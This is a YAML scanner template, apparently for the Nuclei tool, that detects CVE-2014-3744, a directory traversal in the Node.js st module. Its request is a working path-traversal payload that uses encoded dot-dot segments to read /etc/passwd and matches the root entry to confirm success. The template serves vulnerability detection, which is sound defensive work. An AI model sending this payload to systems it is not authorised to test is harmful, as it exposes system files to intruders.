26 lines
716 B
YAML
26 lines
716 B
YAML
id: CVE-2014-3744
|
|
|
|
info:
|
|
name: Node.js st module Directory Traversal
|
|
author: geeknik
|
|
description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
|
|
reference:
|
|
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
|
|
- https://snyk.io/vuln/npm:st:20140206
|
|
severity: high
|
|
tags: cve,cve2014,lfi,nodejs,st
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|